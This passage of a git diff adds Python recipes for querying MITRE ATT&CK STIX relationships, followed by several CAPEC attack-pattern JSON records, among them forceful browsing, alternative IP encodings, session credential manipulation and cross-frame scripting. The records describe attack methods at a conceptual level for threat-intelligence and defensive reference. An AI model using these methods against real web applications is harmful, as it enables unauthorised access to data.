groups_attributing_to_campaigns["groups"]: + groups_attributed_to_campaigns.extend(groups_attributing_to_campaigns["groups"][campaign_id]) + + # update groups using software to include software used by a groups attributed campaign + if software_id in groups_using_software: + groups_using_software[software_id].extend(groups_attributed_to_campaigns) + else: + groups_using_software[software_id] = groups_attributed_to_campaigns + return groups_using_software + +# software:campaign +def software_used_by_campaigns(thesrc): + """returns campaign_id => {software, relationship} for each software used by the campaign.""" + tools_used_by_campaign = get_related(thesrc, "campaign", "uses", "tool") + malware_used_by_campaign = get_related(thesrc, "campaign", "uses", "malware") + return {**tools_used_by_campaign, **malware_used_by_campaign} + +def campaigns_using_software(thesrc): + """returns software_id => {campaign, relationship} for each campaign using the software.""" + campaigns_using_tool = get_related(thesrc, "campaign", "uses", "tool", reverse=True) + campaigns_using_malware = get_related(thesrc, "campaign", "uses", "malware", reverse=True) + return {**campaigns_using_tool, **campaigns_using_malware} + +# campaign:group +def groups_attributing_to_campaign(thesrc): + """returns campaign_id => {group, relationship} for each group attributing to the campaign.""" + return get_related(thesrc, "campaign", "attributed-to", "intrusion-set") + +def campaigns_attributed_to_group(thesrc): + """returns group_id => {campaign, relationship} for each campaign attributed to the group.""" + return get_related(thesrc, "campaign", "attributed-to", "intrusion-set", reverse=True) + +# technique:group +def techniques_used_by_groups(thesrc): + """returns group_id => {technique, relationship} for each technique used by the group and each + technique used by campaigns attributed to the group.""" + # get all techniques used by groups + techniques_used_by_groups = get_related(thesrc, "intrusion-set", "uses", "attack-pattern") # group_id => {technique, relationship} + + # get groups attributing to campaigns and all techniques used by campaigns + campaigns_attributed_to_group = { + "campaigns": get_related(thesrc, "campaign", "attributed-to", "intrusion-set", reverse=True), # group_id => {campaign, relationship} + "techniques": get_related(thesrc, "campaign", "uses", "attack-pattern") # campaign_id => {technique, relationship} + } + + for group_id in campaigns_attributed_to_group["campaigns"]: + techniques_used_by_campaigns = [] + # check if attributed campaign is using technique + for campaign in campaigns_attributed_to_group["campaigns"][group_id]: + campaign_id = campaign["object"]["id"] + if campaign_id in campaigns_attributed_to_group["techniques"]: + techniques_used_by_campaigns.extend(campaigns_attributed_to_group["techniques"][campaign_id]) + + # update techniques used by groups to include techniques used by a groups attributed campaign + if group_id in techniques_used_by_groups: + techniques_used_by_groups[group_id].extend(techniques_used_by_campaigns) + else: + techniques_used_by_groups[group_id] = techniques_used_by_campaigns + return techniques_used_by_groups + +def groups_using_technique(thesrc): + """returns technique_id => {group, relationship} for each group using the technique and each campaign attributed to groups using the technique.""" + # get all groups using techniques + groups_using_techniques = get_related(thesrc, "intrusion-set", "uses", "attack-pattern", reverse=True) # technique_id => {group, relationship} + + # get campaigns attributed to groups and all campaigns using techniques + groups_attributing_to_campaigns = { + "campaigns": get_related(thesrc, "campaign", "uses", "attack-pattern", reverse=True), # technique_id => {campaign, relationship} + "groups": get_related(thesrc, "campaign", "attributed-to", "intrusion-set") # campaign_id => {group, relationship} + } + + for technique_id in groups_attributing_to_campaigns["campaigns"]: + campaigns_attributed_to_group = [] + # check if campaign is attributed to group + for campaign in groups_attributing_to_campaigns["campaigns"][technique_id]: + campaign_id = campaign["object"]["id"] + if campaign_id in groups_attributing_to_campaigns["groups"]: + campaigns_attributed_to_group.extend(groups_attributing_to_campaigns["groups"][campaign_id]) + + # update groups using techniques to include techniques used by a groups attributed campaign + if technique_id in groups_using_techniques: + groups_using_techniques[technique_id].extend(campaigns_attributed_to_group) + else: + groups_using_techniques[technique_id] = campaigns_attributed_to_group + return groups_using_techniques + +# technique:campaign +def techniques_used_by_campaigns(thesrc): + """returns campaign_id => {technique, relationship} for each technique used by the campaign.""" + return get_related(thesrc, "campaign", "uses", "attack-pattern") + +def campaigns_using_technique(thesrc): + """returns technique_id => {campaign, relationship} for each campaign using the technique.""" + return get_related(thesrc, "campaign", "uses", "attack-pattern", reverse=True) + +# technique:software +def techniques_used_by_software(thesrc): + """return software_id => {technique, relationship} for each technique used by the software.""" + techniques_by_tool = get_related(thesrc, "tool", "uses", "attack-pattern") + techniques_by_malware = get_related(thesrc, "malware", "uses", "attack-pattern") + return {**techniques_by_tool, **techniques_by_malware} + +def software_using_technique(thesrc): + """return technique_id => {software, relationship} for each software using the technique.""" + tools_by_technique_id = get_related(thesrc, "tool", "uses", "attack-pattern", reverse=True) + malware_by_technique_id = get_related(thesrc, "malware", "uses", "attack-pattern", reverse=True) + return {**tools_by_technique_id, **malware_by_technique_id} + +# technique:mitigation +def mitigation_mitigates_techniques(thesrc): + """return mitigation_id => {technique, relationship} for each technique mitigated by the mitigation.""" + return get_related(thesrc, "course-of-action", "mitigates", "attack-pattern", reverse=False) + +def technique_mitigated_by_mitigations(thesrc): + """return technique_id => {mitigation, relationship} for each mitigation of the technique.""" + return get_related(thesrc, "course-of-action", "mitigates", "attack-pattern", reverse=True) + +# technique:sub-technique +def subtechniques_of(thesrc): + """return technique_id => {subtechnique, relationship} for each subtechnique of the technique.""" + return get_related(thesrc, "attack-pattern", "subtechnique-of", "attack-pattern", reverse=True) + +def parent_technique_of(thesrc): + """return subtechnique_id => {technique, relationship} describing the parent technique of the subtechnique""" + return get_related(thesrc, "attack-pattern", "subtechnique-of", "attack-pattern")[0] + +# technique:data-component +def datacomponent_detects_techniques(thesrc): + """return datacomponent_id => {technique, relationship} describing the detections of each data component""" + return get_related(thesrc, "x-mitre-data-component", "detects", "attack-pattern") + +def technique_detected_by_datacomponents(thesrc): + """return technique_id => {datacomponent, relationship} describing the data components that can detect the technique""" + return get_related(thesrc, "x-mitre-data-component", "detects", "attack-pattern", reverse=True) + +# Example usage: +src = MemoryStore() +src.load_from_file("path/to/enterprise-attack.json") + +group_id_to_software = software_used_by_groups(src) +pprint(group_id_to_software["intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050"]) # G0019 +# [ +# { +# "object": Malware, # S0061 +# "relationship": Relationship # relationship between G0019 and S0061 +# }, +# { +# ... +# } +# ] +``` + +#### Getting techniques used by a group's software + +Because a group uses software, and software uses techniques, groups can be considered indirect users of techniques used by their software. +These techniques are oftentimes distinct from the techniques used directly by a group, although there are occasionally intersections in these two sets of techniques. + +The following recipe can be used to retrieve the techniques used by a group's software: + +```python +from stix2.utils import get_type_from_id +from stix2 import Filter + +def get_techniques_by_group_software(thesrc, group_stix_id): + # get the malware, tools that the group uses + group_uses = [ + r for r in thesrc.relationships(group_stix_id, 'uses', source_only=True) + if get_type_from_id(r.target_ref) in ['malware', 'tool'] + ] + + # get the technique stix ids that the malware, tools use + software_uses = thesrc.query([ + Filter('type', '=', 'relationship'), + Filter('relationship_type', '=', 'uses'), + Filter('source_ref', 'in', [r.source_ref for r in group_uses]) + ]) + + #get the techniques themselves + return thesrc.query([ + Filter('type', '=', 'attack-pattern'), + Filter('id', 'in', [r.target_ref for r in software_uses]) + ]) + +get_techniques_by_group_software(src, "intrusion-set--f047ee18-7985-4946-8bfb-4ed754d3a0dd") +``` + +### Working with deprecated and revoked objects + +Objects that are deemed no longer beneficial to track as part of the knowledge base are marked as deprecated, and objects which are replaced by a different object are revoked. In both cases, the old object is marked with a field (either `x_mitre_deprecated` or `revoked`) noting their status. In the case of revoked objects, a relationship of type `revoked-by` is also created targeting the replacing object. + +Unlike other objects in the dataset, relationships cannot be revoked or deprecated. Relationships are considered deprecated/revoked if one of the objects it is attached to is revoked or deprecated. + +#### Removing revoked and deprecated objects + +Revoked and deprecated objects are kept in the knowledge base so that workflows relying on those objects are not +broken. We recommend you filter out revoked and deprecated objects from your views whenever possible since they are no +longer maintained by ATT&CK. + +We recommend _not_ using built-in STIX filters for removing revoked objects (e.g `Filter('revoked', '=', False)`). This is because the behavior of this specific filter is inconsistent depending on the method of access (using local data or accessing via the TAXII server). We recommend using the following code example to filter revoked objects instead. See [issue #127](https://github.com/mitre/cti/issues/127) for more details. + +```python +from stix2 import Filter + +def remove_revoked_deprecated(stix_objects): + """Remove any revoked or deprecated objects from queries made to the data source""" + # Note we use .get() because the property may not be present in the JSON data. The default is False + # if the property is not set. + return list( + filter( + lambda x: x.get("x_mitre_deprecated", False) is False and x.get("revoked", False) is False, + stix_objects + ) + ) + +mitigations = src.query([ Filter("type", "=", "course-of-action") ]) +mitigations = remove_revoked_deprecated(mitigations) +``` + +#### Getting a revoking object + +When an object is replaced by another object, it is marked with the field `revoked` and a relationship of type `revoked-by` is created where the `source_ref` is the revoked object and the `target_ref` is the revoking object. This relationship can be followed to find the replacing object: + +```python +from stix2 import Filter + +def getRevokedBy(stix_id, thesrc): + relations = thesrc.relationships(stix_id, 'revoked-by', source_only=True) + revoked_by = thesrc.query([ + Filter('id', 'in', [r.target_ref for r in relations]), + Filter('revoked', '=', False) + ]) + if revoked_by is not None: + revoked_by = revoked_by[0] + + return revoked_by + +getRevokedBy("attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df", src) +``` diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json new file mode 100644 index 0000000000000000000000000000000000000000..2a10ac5ca3f9147ccc337112a7b040eb0ade66ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json @@ -0,0 +1,88 @@ +{ + "id": "bundle--3854e44a-10ea-4970-8e82-5db4b70ba65e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.", + "external_references": [ + { + "external_id": "CAPEC-87", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/87.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Predictable Resource Location", + "external_id": "34", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Predictable-Resource-Location" + }, + { + "description": "Forced browsing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Forced_browsing" + } + ], + "id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Forceful Browsing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Spider: Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.

    2. Techniques
    Use a spidering tool to follow and record all links.
    Use a proxy tool to record all links visited during a manual traversal of the web application.

Experiment

  1. Attempt well-known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.

    2. Techniques
    Use a spidering tool to follow and record attempts on well-known URLs.
    Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.

Exploit

  1. Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality.

    2. Techniques
    Access unprotected functions and execute them.

  2. View unauthorized data: The attacker discovers and views unprotected sensitive data.

    3. Techniques
    Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The forcibly browseable pages or accessible resources must be discoverable and improperly protected." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement." + ], + "x_capec_skills_required": { + "Low": "Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json new file mode 100644 index 0000000000000000000000000000000000000000..78bb47c317cab634854951db79640ea1d2a8fbcc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--e5816f1d-9092-4885-a6c2-a171216583ed", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-409", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/409.html" + } + ], + "id": "attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Non-Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json new file mode 100644 index 0000000000000000000000000000000000000000..e5cdd16da49f61ac9ffa5218d58e0409a16ffa21 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json @@ -0,0 +1,45 @@ +{ + "id": "bundle--1fb1c501-9ddd-4631-957c-e93abe88c5c6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.", + "external_references": [ + { + "external_id": "CAPEC-391", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/391.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Bypassing Physical Locks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json new file mode 100644 index 0000000000000000000000000000000000000000..c6468c4afb4ed1921bde730bd4d975786ea85c40 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json @@ -0,0 +1,77 @@ +{ + "id": "bundle--da81b06e-418a-4798-97f9-f4c8cb5d3327", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on the adversary using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.", + "external_references": [ + { + "external_id": "CAPEC-4", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/4.html" + }, + { + "external_id": "CWE-291", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/291.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Using Alternative IP Address Encodings", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for IP addresses as user input: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application where IP addresses are used.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts alternate IP address encodings, observing application behavior. The adversary will also attempt to access the application through an alternate IP address encoding to see if access control changes

    2. Techniques
    Instead of using a URL, use the IP address that the URL resolves to
    Specify a port directly to a URL input
    Omit or add \"http://\" or \"https://\" to a URL to see if the application behaves differently

Exploit

  1. Bypass access control: Using an alternate IP address encoding, the adversary will either access the application or give the alternate encoding as input, bypassing access control restrictions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target software must fail to anticipate all of the possible valid encodings of an IP/web address.", + "The adversary must have the ability to communicate with the server." + ], + "x_capec_resources_required": [ + "The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities." + ], + "x_capec_skills_required": { + "Low": "The adversary has only to try IP address format combinations." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json new file mode 100644 index 0000000000000000000000000000000000000000..e13fa2498d623c8c3383344aff70a5eb06ba0e42 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json @@ -0,0 +1,47 @@ +{ + "id": "bundle--fe6f08e4-c5b7-46a8-bcba-74e070e9a67f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.", + "external_references": [ + { + "external_id": "CAPEC-185", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + } + ], + "id": "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Software Download", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862" + ], + "x_capec_child_of_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json new file mode 100644 index 0000000000000000000000000000000000000000..cf58ae1b255fcca4ba6cb4bac7ebbcb76bc300ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json @@ -0,0 +1,53 @@ +{ + "id": "bundle--0a37fa8f-a546-401d-abbe-86fb154ca01e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server.", + "external_references": [ + { + "external_id": "CAPEC-226", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Session Credential Falsification through Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.\n ", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users." + ], + "x_capec_resources_required": [ + "An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json new file mode 100644 index 0000000000000000000000000000000000000000..bf86f0d11b5ab927bf01923c106264207422c6f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json @@ -0,0 +1,47 @@ +{ + "id": "bundle--ec12a87d-bd00-4882-b543-f429cf18fae4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", + "external_references": [ + { + "external_id": "CAPEC-208", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/208.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations." + ], + "x_capec_resources_required": [ + "The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json new file mode 100644 index 0000000000000000000000000000000000000000..4ad62eba9575ffd4a2c76fd876216cfd154e6c81 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json @@ -0,0 +1,70 @@ +{ + "id": "bundle--1769491d-4eb9-4e12-9f8c-3d73dabca10d", + "objects": [ + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.", + "external_references": [ + { + "external_id": "CAPEC-587", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/587.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Cross Frame Scripting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Frame_Scripting" + }, + { + "description": "Cross Frame Scripting, 2016, OWASP", + "external_id": "REF-469", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Cross_Frame_Scripting" + }, + { + "description": "Gustave Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson, Busting Frame Busting: a Study of Clickjacking 